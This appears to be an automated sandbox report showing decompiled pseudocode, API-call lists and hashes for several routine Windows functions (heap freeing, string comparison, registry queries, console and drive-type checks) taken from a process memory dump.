						if(_t9 >= 0 && _t25 < 2) {
							_t18 =  *(0x11fd5b8 + _t35 * 4);
							if(_t18 != 0) {
								VirtualFree(_t18, 0, 0x8000);
								 *(0x11fd5b8 + _t35 * 4) = 0;
							}
						}
						_t35 = _t35 + 1;
						_t9 = _t35;
						_t25 = _t9;
					} while (_t35 < 2);
					 *0x120b8ac = _t33;
					_push(0);
					_push(0x120b940);
					 *0x120b8a8 = _t23;
					 *0x1203892 = 0;
					 *0x120b8a4 = 0x1203892;
					 *0x120b8a0 = 0x1203892;
					L011E82C1();
					if(0 != 0) {
						return 0;
					}
					 *0x11fd558 = 0;
					 *0x11fd554 = 0;
					_t36 = E011DDC74(_t23, 0);
					if(_t36 == 0) {
						_t12 = 1;
					} else {
						if(E011DEEC8() != 0 && E011DF030(0) != 0xa &&  *0x120fa90 != 0) {
							E011F82EB(0);
						}
						_t12 = 0;
					}
					 *0x11fd5c8 = _t12;
					if( *0x120fa88 != 0) {
						E011F8121(_t36, 0);
					}
					return _t36;
				}
				while(1) {
					_t32 =  *0x1213cdc;
					if(_t32 == 0) {
						goto L4;
					}
					 *_t32 = 0;
					 *0x1213cdc =  *(_t32 + 4);
					 *0x1213cd8 = _t8 - 1;
					 *(_t32 + 4) = 0;
					RtlFreeHeap(GetProcessHeap(), 0, _t32);
					_t8 =  *0x1213cd8;
					if(_t8 > _t34) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}















                                                    0x011deef5
                                                    0x011deefc
                                                    0x011deeff
                                                    0x011def02
                                                    0x011def04
                                                    0x011def0c
                                                    0x011def4f
                                                    0x011def4f
                                                    0x011def51
                                                    0x011def53
                                                    0x011def55
                                                    0x011def57
                                                    0x011def5e
                                                    0x011def67
                                                    0x011df00d
                                                    0x011df013
                                                    0x011df013
                                                    0x011def67
                                                    0x011def6d
                                                    0x011def6e
                                                    0x011def70
                                                    0x011def72
                                                    0x011def79
                                                    0x011def7f
                                                    0x011def80
                                                    0x011def85
                                                    0x011def8b
                                                    0x011def91
                                                    0x011def9b
                                                    0x011defa5
                                                    0x011defaf
                                                    0x011deffb
                                                    0x011deffb
                                                    0x011defb3
                                                    0x011defb8
                                                    0x011defc2
                                                    0x011defc6
                                                    0x011deffe
                                                    0x011defc8
                                                    0x011defcf
                                                    0x011ec117
                                                    0x011ec117
                                                    0x011defe1
                                                    0x011defe1
                                                    0x011defea
                                                    0x011defef
                                                    0x011ec125
                                                    0x011ec125
                                                    0x00000000
                                                    0x011deff5
                                                    0x011def10
                                                    0x011def10
                                                    0x011def18
                                                    0x00000000
                                                    0x00000000
                                                    0x011def1f
                                                    0x011def27
                                                    0x011def2d
                                                    0x011def32
                                                    0x011def40
                                                    0x011def46
                                                    0x011def4d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011def4d
                                                    0x00000000

                                                    APIs
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                                    • RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                                    • _setjmp3.MSVCRT ref: 011DEFA5
                                                    • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DF00D
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                    • String ID:
                                                    • API String ID: 2613391085-0
                                                    • Opcode ID: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                                    • Instruction ID: 32d94aa905706fb3b5fd6c586a578578908704fa008467da15e92370d5f46cb2
                                                    • Opcode Fuzzy Hash: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                                    • Instruction Fuzzy Hash: 10319C716012119FEB3DEF6EB80C72A7AE5BB54B19F14416EE509CB285DB70D880CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F579A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E011F579A(void* __ecx, void* __eflags) {
				char* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				signed int _t13;
				short _t21;
				char* _t25;
				int _t29;
				short* _t32;
				void* _t35;
				short* _t37;
				short* _t41;
				int _t46;

				_push(__ecx);
				_t7 = E011E7797(__ecx);
				if(_t7 != 0) {
					_t7 =  *0x121c018(0, 0);
					if(0 != 0) {
						_t28 = 0;
						_t41 = E011E00B0(0);
						if(_t41 == 0) {
							L3:
							E011F9287(_t28);
							__imp__longjmp(0x120b8b8, 1);
						}
						_t28 = 0;
						_t25 = E011E00B0(0);
						_v8 = _t25;
						if(_t25 == 0) {
							goto L3;
						}
						if(E011E7797(0) != 0) {
							 *0x121c018(0, _t25);
						}
						_t29 =  *0x1203854;
						_t13 = E011E0638(_t29);
						asm("sbb eax, eax");
						MultiByteToWideChar(_t29,  ~( ~_t13), _t25, 0xffffffff, _t41, 0);
						_t46 = SetErrorMode(1);
						if( *_t41 != 0) {
							_t35 = 0;
							do {
								E011E33FC(0, _t41, _t35 + _t35, _t41, _t46, _t35 + _t35);
								_t32 = _t41;
								_t3 =  &(_t32[1]); // 0x2
								_t37 = _t3;
								do {
									_t21 =  *_t32;
									_t32 =  &(_t32[1]);
								} while (_t21 != 0);
								_t35 = 1;
								_t41 =  &(( &(_t41[_t32 - _t37 >> 1]))[1]);
							} while ( *_t41 != 0);
							_t25 = _v8;
						}
						SetErrorMode(_t46);
						_t7 = E011E0040(_t25);
					}
				}
				return _t7;
			}


















                                                    0x011f579f
                                                    0x011f57a3
                                                    0x011f57aa
                                                    0x011f57b4
                                                    0x011f57be
                                                    0x011f57c4
                                                    0x011f57cc
                                                    0x011f57d0
                                                    0x011f57d2
                                                    0x011f57d2
                                                    0x011f57de
                                                    0x011f57de
                                                    0x011f57e4
                                                    0x011f57eb
                                                    0x011f57ed
                                                    0x011f57f2
                                                    0x00000000
                                                    0x00000000
                                                    0x011f57fb
                                                    0x011f57ff
                                                    0x011f57ff
                                                    0x011f5805
                                                    0x011f580b
                                                    0x011f5816
                                                    0x011f581d
                                                    0x011f582b
                                                    0x011f5832
                                                    0x011f5834
                                                    0x011f5838
                                                    0x011f583c
                                                    0x011f5841
                                                    0x011f5843
                                                    0x011f5843
                                                    0x011f5846
                                                    0x011f5846
                                                    0x011f5849
                                                    0x011f584c
                                                    0x011f5857
                                                    0x011f585b
                                                    0x011f585e
                                                    0x011f5863
                                                    0x011f5863
                                                    0x011f5867
                                                    0x011f586f
                                                    0x011f586f
                                                    0x011f57be
                                                    0x011f587a

                                                    APIs
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,011E3A4E,?,?,?,?,?,?,?,?), ref: 011F57DE
                                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F581D
                                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5825
                                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5867
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
                                                    • String ID:
                                                    • API String ID: 162963024-0
                                                    • Opcode ID: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                                    • Instruction ID: 3470260970c4f6054cff1013fd6ad86558c2cb568a0ebd0c722e94788eab0564
                                                    • Opcode Fuzzy Hash: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                                    • Instruction Fuzzy Hash: 53212C35700A029BD738EBB99C5C9BE775BDFD4254B19022CEE0687284DF718E4187A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F29B9, Relevance: 6.1, APIs: 4, Instructions: 85memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011F29B9(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _t39;
				intOrPtr* _t42;
				intOrPtr* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				intOrPtr* _t54;
				void* _t60;
				long _t69;
				void* _t71;

				_t54 = _a4;
				_t71 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t54 + 4));
				_t39 = __ecx + 0xc;
				 *_t39 = 0;
				_v12 = _t39;
				 *((short*)(__ecx + 0x10)) =  *((intOrPtr*)(_t54 + 0x20));
				 *((intOrPtr*)(__ecx + 0x14)) =  *_t54;
				_t42 = __ecx + 0x1c;
				 *_t42 = 0;
				_v16 = _t42;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t54 + 0x48));
				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t54 + 0x4c));
				_t45 = __ecx + 0x28;
				 *_t45 = 0;
				_v20 = _t45;
				_t46 = E011F28F1( *((intOrPtr*)(_t54 + 0xc)));
				_t47 = E011F28D9( *((intOrPtr*)(_t54 + 0x1c)));
				_t48 = E011F28D9( *((intOrPtr*)(_t54 + 0x44)));
				_t69 = _t46 + _t47 + _t48;
				if( *((intOrPtr*)(__ecx + 0x2c)) == 0 ||  *((intOrPtr*)(__ecx + 0x30)) < _t69) {
					_t48 = HeapAlloc(GetProcessHeap(), 8, _t69);
					_v8 = _t48;
					if(_t48 != 0) {
						RtlFreeHeap(GetProcessHeap(), 0,  *(_t71 + 0x2c));
						_t48 = _v8;
						 *(_t71 + 0x2c) = _t48;
						 *(_t71 + 0x30) = _t69;
					}
				}
				_t60 =  *(_t71 + 0x2c);
				if(_t60 != 0) {
					_t73 = _t60 +  *(_t71 + 0x30);
					_t48 = E011F162E(E011F15C1(E011F15C1(_t60, _t60 +  *(_t71 + 0x30),  *((intOrPtr*)(_t54 + 0x1c)), _v12), _t73,  *((intOrPtr*)(_t54 + 0x44)), _v16), _t73,  *((intOrPtr*)(_t54 + 0xc)), _v20);
				}
				return _t48;
			}

















                                                    0x011f29c5
                                                    0x011f29c9
                                                    0x011f29ce
                                                    0x011f29d4
                                                    0x011f29d7
                                                    0x011f29da
                                                    0x011f29dc
                                                    0x011f29e3
                                                    0x011f29e9
                                                    0x011f29ec
                                                    0x011f29ef
                                                    0x011f29f1
                                                    0x011f29f7
                                                    0x011f29fd
                                                    0x011f2a00
                                                    0x011f2a03
                                                    0x011f2a08
                                                    0x011f2a0b
                                                    0x011f2a15
                                                    0x011f2a1f
                                                    0x011f2a24
                                                    0x011f2a2a
                                                    0x011f2a3b
                                                    0x011f2a41
                                                    0x011f2a46
                                                    0x011f2a54
                                                    0x011f2a5a
                                                    0x011f2a5d
                                                    0x011f2a60
                                                    0x011f2a60
                                                    0x011f2a46
                                                    0x011f2a63
                                                    0x011f2a68
                                                    0x011f2a70
                                                    0x011f2a95
                                                    0x011f2a95
                                                    0x011f2aa0

                                                    APIs
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A34
                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A3B
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A4D
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2A54
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: 6fa60d7e79a3e40e8fc35647d52b77907693c8a6404d2fe79977106f15287ac0
                                                    • Instruction ID: f1e68768cc038b9fca5a46d3a0311cdfb8e442dac5001c7270271d2d0dc97ed5
                                                    • Opcode Fuzzy Hash: 6fa60d7e79a3e40e8fc35647d52b77907693c8a6404d2fe79977106f15287ac0
                                                    • Instruction Fuzzy Hash: D9311375A00604EFCB29DF69D49895ABBF5FF48310B04856EEE4A87714EB30E941CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E4E94, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E011E4E94(void*** __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t16;
				signed int _t17;
				void* _t21;
				void* _t22;
				void*** _t27;
				void* _t37;
				void* _t38;
				void** _t39;
				signed int _t40;

				_t37 = __edx;
				_t13 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t13 ^ _t40;
				_t27 = __ecx;
				_t29 = 0x2c;
				_t39 = E011E00B0(_t29);
				if(_t39 == 0) {
					L6:
					_t16 = E011F9287(_t29);
					__imp__longjmp(0x120b8b8, 1);
					L7:
					__imp___get_osfhandle(1);
					 *_t39 = _t16;
					_t17 = GetConsoleScreenBufferInfo(_t16,  &_v32);
					if(_t17 == 0) {
						 *_t39 =  *_t39 & _t17;
					}
					L2:
					if(GetConsoleScreenBufferInfo( *_t39,  &_v32) != 0) {
						_t38 = 0x2000;
						_t21 = _v32.dwSize + 2;
						if(_t21 >= 0x2000) {
							_t38 = _t21;
						}
					} else {
						_t38 = 0x2002;
					}
					_t29 = _t38 + _t38;
					_t22 = E011E00B0(_t38 + _t38);
					if(_t22 != 0) {
						_t39[4] = _t22;
						_t39[3] = _t38;
						_t39[5] = 0;
						_t39[2] = 0;
						_t39[1] = 0;
						_t39[9] = 0;
						E011E4F29(_t39);
						 *_t27 = _t39;
						return E011E6FD0(0, _t27, _v8 ^ _t40, _t37, _t38, _t39);
					}
					goto L6;
				}
				 *_t39 =  *_t39 & 0x00000000;
				_t16 = E011E0178(_t15);
				if(_t16 != 0) {
					goto L7;
				}
				goto L2;
			}


















                                                    0x011e4e94
                                                    0x011e4e9c
                                                    0x011e4ea3
                                                    0x011e4eab
                                                    0x011e4ead
                                                    0x011e4eb3
                                                    0x011e4eb7
                                                    0x011ef00a
                                                    0x011ef00a
                                                    0x011ef016
                                                    0x011ef01c
                                                    0x011ef01e
                                                    0x011ef028
                                                    0x011ef02c
                                                    0x011ef034
                                                    0x011ef03a
                                                    0x011ef03a
                                                    0x011e4ed0
                                                    0x011e4ede
                                                    0x011ef045
                                                    0x011ef04a
                                                    0x011ef04f
                                                    0x011ef055
                                                    0x011ef055
                                                    0x011e4ee4
                                                    0x011e4ee4
                                                    0x011e4ee4
                                                    0x011e4ee9
                                                    0x011e4eec
                                                    0x011e4ef3
                                                    0x011e4ef9
                                                    0x011e4f00
                                                    0x011e4f03
                                                    0x011e4f06
                                                    0x011e4f09
                                                    0x011e4f0c
                                                    0x011e4f0f
                                                    0x011e4f1a
                                                    0x011e4f28
                                                    0x011e4f28
                                                    0x00000000
                                                    0x011e4ef3
                                                    0x011e4ebd
                                                    0x011e4ec3
                                                    0x011e4eca
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000104,00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF016
                                                    • _get_osfhandle.MSVCRT ref: 011EF01E
                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF02C
                                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
                                                    • String ID:
                                                    • API String ID: 1629431960-0
                                                    • Opcode ID: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                                    • Instruction ID: 2e8e8ef8b68457230fb79b11b6cbd85ca4eb97679f866bedc89ea06818a08adb
                                                    • Opcode Fuzzy Hash: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                                    • Instruction Fuzzy Hash: 0321F571A00B069FE7389FB4E44CB7ABBE5EF24715F04082EE846C6140EB75D801CB41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DAEB0, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 43%
                                                    			E011DAEB0(void* __ecx, intOrPtr _a4) {
				wchar_t* _v8;
				wchar_t* _v12;
				long _t25;
				signed int _t26;
				void* _t28;
				signed int _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				signed int _t36;
				intOrPtr _t45;
				long _t48;
				signed int _t49;

				_t45 = _a4;
				_t48 = wcstol( *(_t45 + 0x38),  &_v8, 0);
				_t25 = wcstol( *(_t45 + 0x3c),  &_v12, 0);
				if( *_v8 != 0 ||  *_v12 != 0) {
					_push( *(_t45 + 0x3c));
					_push( *(_t45 + 0x38));
					if(( *(_t45 + 0x40) & 0x00000002) != 0) {
						_t26 = lstrcmpiW();
					} else {
						_t26 = lstrcmpW();
					}
					_t49 = _t26;
					goto L3;
				} else {
					_t49 = _t48 - _t25;
					L3:
					_t28 =  *((intOrPtr*)(_t45 + 0x44)) - 1;
					if(_t28 == 0) {
						_t30 = 0 | _t49 == 0x00000000;
						L9:
						return _t30;
					}
					_t31 = _t28 - 1;
					if(_t31 == 0) {
						_t30 = 0 | _t49 != 0x00000000;
						goto L9;
					}
					_t33 = _t31 - 1;
					if(_t33 == 0) {
						L14:
						_t30 = _t49 >> 0x1f;
						goto L9;
					}
					_t34 = _t33 - 1;
					if(_t34 == 0) {
						_t30 = 0 | _t49 <= 0x00000000;
						goto L9;
					}
					_t36 = _t34 - 1;
					if(_t36 != 0) {
						if(_t36 != 1) {
							_t30 = 0;
							goto L9;
						}
						_t49 =  !_t49;
						goto L14;
					}
					_t30 = _t36 & 0xffffff00 | _t49 > 0x00000000;
					goto L9;
				}
			}
















                                                    0x011daeba
                                                    0x011daecd
                                                    0x011daed7
                                                    0x011daee6
                                                    0x011daf49
                                                    0x011daf4c
                                                    0x011daf4f
                                                    0x011daf5b
                                                    0x011daf51
                                                    0x011daf51
                                                    0x011daf51
                                                    0x011daf57
                                                    0x00000000
                                                    0x011daef0
                                                    0x011daef0
                                                    0x011daef2
                                                    0x011daef5
                                                    0x011daef8
                                                    0x011daf20
                                                    0x011daf13
                                                    0x011daf19
                                                    0x011daf19
                                                    0x011daefa
                                                    0x011daefd
                                                    0x011daf29
                                                    0x00000000
                                                    0x011daf29
                                                    0x011daeff
                                                    0x011daf02
                                                    0x011daf35
                                                    0x011daf38
                                                    0x00000000
                                                    0x011daf38
                                                    0x011daf04
                                                    0x011daf07
                                                    0x011daf40
                                                    0x00000000
                                                    0x011daf40
                                                    0x011daf09
                                                    0x011daf0c
                                                    0x011daf31
                                                    0x011daf63
                                                    0x00000000
                                                    0x011daf63
                                                    0x011daf33
                                                    0x00000000
                                                    0x011daf33
                                                    0x011daf10
                                                    0x00000000
                                                    0x011daf10

                                                    APIs
                                                    • wcstol.MSVCRT ref: 011DAEC7
                                                    • wcstol.MSVCRT ref: 011DAED7
                                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF51
                                                    • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF5B
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: wcstol$lstrcmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 4273384694-0
                                                    • Opcode ID: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                                    • Instruction ID: c35f12d9e28c13a1475bf28ff1810d70f98651d886688a9cd6f5d20969a42f23
                                                    • Opcode Fuzzy Hash: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                                    • Instruction Fuzzy Hash: A511A5B2900526AB8B6DDE7CFA5C8797B68FF0125470603D0E901D79C4D725ED60C6D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F997C, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E011F997C(WCHAR* __ecx, void* __edi) {
				signed int _v8;
				long _v20;
				char _v24;
				signed int _v28;
				void _v548;
				WCHAR* _v552;
				void* __ebx;
				void* __esi;
				signed int _t24;
				WCHAR* _t37;
				long _t38;
				void* _t39;
				WCHAR* _t40;
				char _t43;
				void* _t51;
				void* _t52;
				WCHAR* _t53;
				signed int _t54;

				_t52 = __edi;
				_t24 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t24 ^ _t54;
				_v552 = _v552 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v20 = 0x104;
				_t43 = 1;
				_t53 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					_t43 = 0;
				} else {
					_t37 = _v28;
					if(_t37 == 0) {
						_t37 =  &_v548;
					}
					_t38 = GetFullPathNameW(_t53, _v20, _t37,  &_v552);
					if(_t38 == 0 || _t38 <= 0xffce) {
						goto L10;
					} else {
						_t39 = _v28;
						if(_t39 == 0) {
							_t39 =  &_v548;
						}
						 *((short*)(_t39 + 6)) = 0;
						_t40 = _v28;
						if(_t40 == 0) {
							_t40 =  &_v548;
						}
						if(GetDriveTypeW(_t40) != 4) {
							goto L10;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t43, _t43, _v8 ^ _t54, _t51, _t52, _t53, _v28);
			}





















                                                    0x011f997c
                                                    0x011f9987
                                                    0x011f998e
                                                    0x011f9991
                                                    0x011f999d
                                                    0x011f99a4
                                                    0x011f99af
                                                    0x011f99b3
                                                    0x011f99b5
                                                    0x011f99b8
                                                    0x011f99e1
                                                    0x011f9a39
                                                    0x011f9a39
                                                    0x011f99e3
                                                    0x011f99e3
                                                    0x011f99e8
                                                    0x011f99ea
                                                    0x011f99ea
                                                    0x011f99fc
                                                    0x011f9a04
                                                    0x00000000
                                                    0x011f9a0d
                                                    0x011f9a0d
                                                    0x011f9a12
                                                    0x011f9a14
                                                    0x011f9a14
                                                    0x011f9a1c
                                                    0x011f9a20
                                                    0x011f9a25
                                                    0x011f9a27
                                                    0x011f9a27
                                                    0x011f9a37
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9a37
                                                    0x011f9a04
                                                    0x011f9a3e
                                                    0x011f9a56

                                                    APIs
                                                    • memset.MSVCRT ref: 011F99B8
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,011D2178,00310030), ref: 011F99FC
                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D2178,00310030), ref: 011F9A2E
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9A3E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$DriveFullNamePathType
                                                    • String ID:
                                                    • API String ID: 3442494845-0
                                                    • Opcode ID: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                                    • Instruction ID: 71ba0e9fa0b896792e1cd5a68a757bbc540353d7ae598a7f4be2f3a570a5bef6
                                                    • Opcode Fuzzy Hash: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                                    • Instruction Fuzzy Hash: 26213571A0011E9BDF25DFE8EC89BBE77B8EB14308F0401A9A605E2141E775DA448B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F5662, Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E011F5662(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t34;
				void* _t44;

				_push(0x1c);
				_push(0x11fc100);
				E011E7678(__ebx, __edi, __esi);
				_t41 = __ecx;
				 *((intOrPtr*)(_t44 - 0x2c)) = __ecx;
				_t43 = 0;
				 *(_t44 - 0x20) = 0;
				 *(_t44 - 0x24) = 0;
				 *(_t44 - 0x1c) = __ecx;
				 *((intOrPtr*)(_t44 - 4)) = 0;
				if(__edx == 0 ||  *__edx == 0) {
					L4:
					_t21 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, 0, _t44 - 0x24);
					if(_t21 != 2) {
						if(_t21 != 0) {
							goto L3;
						} else {
							_t43 = E011E00B0( *(_t44 - 0x24));
							 *(_t44 - 0x20) = _t43;
							if(_t43 == 0) {
								_push(8);
								goto L11;
							} else {
								_t34 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, _t43, _t44 - 0x24);
								if(_t34 != 0) {
									E011E0040(_t43);
									_t43 = 0;
									 *(_t44 - 0x20) = 0;
									_push(_t34);
									goto L11;
								}
							}
						}
					} else {
						_t43 = E011DDF40(0x11d24ac);
						 *(_t44 - 0x20) = _t30;
					}
				} else {
					_t21 = RegOpenKeyExW(__ecx, __edx, 0, 1, _t44 - 0x1c);
					if(_t21 == 0) {
						goto L4;
					} else {
						L3:
						_push(_t21);
						L11:
						SetLastError();
					}
				}
				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
				E011F572C(_t41);
				return E011E76BD(_t43);
			}






                                                    0x011f5662
                                                    0x011f5664
                                                    0x011f5669
                                                    0x011f566e
                                                    0x011f5670
